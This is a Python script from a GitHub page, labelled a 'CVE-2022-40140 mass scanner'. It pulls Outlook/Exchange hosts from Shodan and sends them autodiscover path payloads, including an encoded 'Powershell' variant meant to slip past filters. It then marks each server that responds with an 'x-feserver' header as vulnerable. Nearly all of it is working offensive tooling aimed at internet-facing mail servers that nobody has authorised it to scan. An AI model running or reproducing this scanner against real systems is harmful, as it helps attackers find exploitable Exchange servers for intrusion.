-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathmain.py
94 lines (70 loc) · 2.95 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
'''
/$$ /$$
|__/ | $$
/$$ /$$$$$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$
| $$ /$$__ $$ /$$_____/| $$__ $$ /$$__ $$| $$ | $$| $$__ $$ /$$__ $$
| $$| $$ \ $$| $$$$$$ | $$ \ $$| $$ \__/| $$ | $$| $$ \ $$| $$ \ $$
| $$| $$ | $$ \____ $$| $$ | $$| $$ | $$ | $$| $$ | $$| $$ | $$
| $$| $$$$$$$/ /$$$$$$$/| $$$$$$$/| $$ | $$$$$$/| $$ | $$| $$$$$$/
|__/| $$____/ |_______/ |_______/ |__/ \______/ |__/ |__/ \______/
| $$
| $$
|__/
CVE-2022-40140 MASS SCANNER
'''
import grequests
import requests
from shodan import Shodan
import uuid
import logging
import urllib3
import urllib
import time
import argparse
from urllib.parse import urlsplit, urlunsplit
api = Shodan('YOUR SHODAN API KEY')
payloads = [
"/autodiscover/[email protected]/owa/?&Email=autodiscover/[email protected]&Protocol=XYZ&FooProtocol=Powershell",
"/autodiscover/autodiscover.json?a..foo.var/owa/?&Email=autodiscover/autodiscover.json?a..foo.var&Protocol=XYZ&FooProtocol=Powershell",
"/autodiscover/autodiscover.json?a..foo.var/owa/?&Email=autodiscover/autodiscover.json?a..foo.var&Protocol=XYZ&FooProtocol=%50owershell"
]
dork ="http.title:\"Outlook\""
repeated= []
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def do_something(r):
if r != None and r and 'x-feserver' in r.headers:
print(r.url,' VULNERABLE', r.status_code)
def base_url(url, with_path=False):
parsed = urllib.parse.urlparse(url)
path = '/'.join(parsed.path.split('/')[:-1]) if with_path else ''
parsed = parsed._replace(path=path)
parsed = parsed._replace(params='')
parsed = parsed._replace(query='')
parsed = parsed._replace(fragment='')
return parsed.geturl()
def main():
start = 0
end = 100
user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0'}
while start < end:
results = api.search(dork,page=start)
urls = []
print('Pagina ', start)
for banner in results["matches"]:
if 'hostnames' in banner:
for hostname in banner["hostnames"]:
if hostname in repeated:
continue
hostname = (base_url('http://'+hostname)).split("http://")[1]
repeated.append(hostname)
urls.append('http://'+hostname)
urls.append('https://'+hostname)
urls.append('http://'+hostname+':'+str(banner["port"]))
urls.append('https://'+hostname+':'+str(banner["port"]))
for payload in payloads:
results = grequests.map((grequests.get(u+payload, headers=user_agent, allow_redirects=False, timeout=10, verify = 'https' in u) for u in urls))
for result in results:
do_something(result)
start += 1
if __name__ == '__main__':
main()